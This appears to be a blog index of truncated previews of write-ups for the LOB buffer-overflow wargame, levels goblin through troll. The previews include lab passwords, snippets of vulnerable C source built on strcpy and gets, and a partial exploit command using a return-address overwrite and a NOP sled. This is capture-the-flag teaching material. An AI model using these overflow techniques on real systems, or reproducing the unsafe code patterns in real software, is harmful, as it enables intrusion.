SystemHacking/LOB(BOF원정대)(20)
[8] orge -> troll ( argv[0] , Symbolic Link )
orge / timewalker
[orge@localhost orge]$ /bin/bash2
[orge@localhost orge]$ SHELL=/bin/bash2
[ troll.c ] #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; // here is changed if(argc != 2){ printf("argc must be two!\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(en..
2017.11.17
[7] darkelf -> orge ( symbolic link & using argv[2] )
darkelf / kernel crashed
[darkelf@localhost darkelf]$ /bin/bash2
[darkelf@localhost darkelf]$ export SHELL=/bin/bash2
[ orge.c ] #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n",..
2017.11.17
[6] wolfman -> darkelf ( using argv[2] )
wolfman / love eyuna
[wolfman@localhost wolfman]$ /bin/bash2
[wolfman@localhost wolfman]$ SHELL=/bin/bash2
[ darkelf.c ] #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); // buff..
2017.11.17
[5] orc -> wolfman ( using argv[2] )
orc / cantata
[orc@localhost orc]$ /bin/bash2
[orc@localhost orc]$ export SHELL=/bin/bash2
[ wolfman.c ] #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc clear environment variables for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your frien..
2017.11.17
[4] goblin -> orc ( using argv[2] )
goblin / hackers proof
[goblin@localhost goblin]$ /bin/bash2
[goblin@localhost goblin]$ export SHELL=/bin/bash2
[ orc.c ] #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc adjustment
[goblin@localhost goblin]$ ./orc $(python -c 'print "A" * 44 + "\x3c\xf9\xff\xbf"') $(python -c 'print "\x90" * 1000 + "..
2017.11.17
[3] cobolt -> goblin ( cat command )
cobolt / hacking exposed
[cobolt@localhost cobolt]$ /bin/bash2
[cobolt@localhost cobolt]$ SHELL=/bin/bash2
[ goblin.c ] int main(){ char buffer[16]; gets(buffer); printf("%s\n", buffer);}
[ Stack layout ] buffer 16 bytes | saved ebp 4 bytes | saved eip (RET)
Unlike the previous problem, the input is not an argument: after running the goblin binary, the string is read through the gets function. Let's perform the overflow using "cat".
1> Put the shellcode in an environment variable
[cobolt@localhost cobolt]$ export ..
2017.11.17